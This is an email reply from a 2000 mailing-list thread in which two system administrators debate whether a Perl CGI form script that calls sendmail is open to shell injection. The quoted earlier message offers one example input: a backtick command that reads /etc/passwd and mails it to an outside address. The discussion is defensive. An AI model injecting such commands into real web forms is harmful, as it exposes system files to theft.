I have not tested this, but I was under the impression that the shell
might present the problem on the last print statement:
--> print MAIL "$args[3]\n";
I'll have to check the O'Reilly book on CGI programming, but this is
pretty bad if I remember correctly. I know that the formail code from
Matt's Script Archive was exploited this way. The only way to be sure
is to test it. As far as I can tell the flow of the program would be
as follows
HTML Form -> PERL Code -> shell.
The backticks would preparsed by the shell. The output of the backtick
statement would then be sent in the email. I am still somewhat of a
perl newbie, so I could be wrong.
Although at this point you may be interacting with the sendmail
wrapper program. If this were the case, there is no risk.
I will try it later tonight and let everyone know.
/Wes
Wesley A. Wannemacher
[EMAIL PROTECTED]
Instructor, Network Administrator
University of Northwestern Ohio
http://www.unoh.edu
> -----Original Message-----
> From: Peter Green [mailto:[EMAIL PROTECTED]]
> Sent: Monday, November 13, 2000 3:16 PM
> To: [EMAIL PROTECTED]
> Subject: Re: perl script acting funny
>
>
> * Wesley Wannemacher <[EMAIL PROTECTED]> [001113 15:09]:
> > I could be a little bit off-base, but it might be a bad idea to
> > approach your problem this way. For instance, what if a
> person enters
> > somewhere in the form:
> > `cat /etc/passwd | mail -s "You dumb f***, you just got hacked"
> > [EMAIL PROTECTED]`
>
> Where exactly would that line be exec'd? There is only one
> place in the
> included code where stuff gets executed...there isn't any
> place to sneak
> your little command to the shell.
>
> > It is notoriously bad to /usr/lib/sendmail from a CGI script. Try
>
> Nah, it isn't all that bad. Especially since he isn't passing any
> possibly-tainted data to the shell (in the open() line).
>
> /pg
> --
> Peter Green : Gospel Communications Network, SysAdmin :
> [EMAIL PROTECTED]
> ---
> The wise man can pick up a grain of sand and envision a
> whole universe. But
> the stupid man will just lay down on some seaweed and roll
> around until he's
> completely draped in it. Then he'll stand up and go: Hey,
> I'm Vine Man.
> (Jack Handey)
>
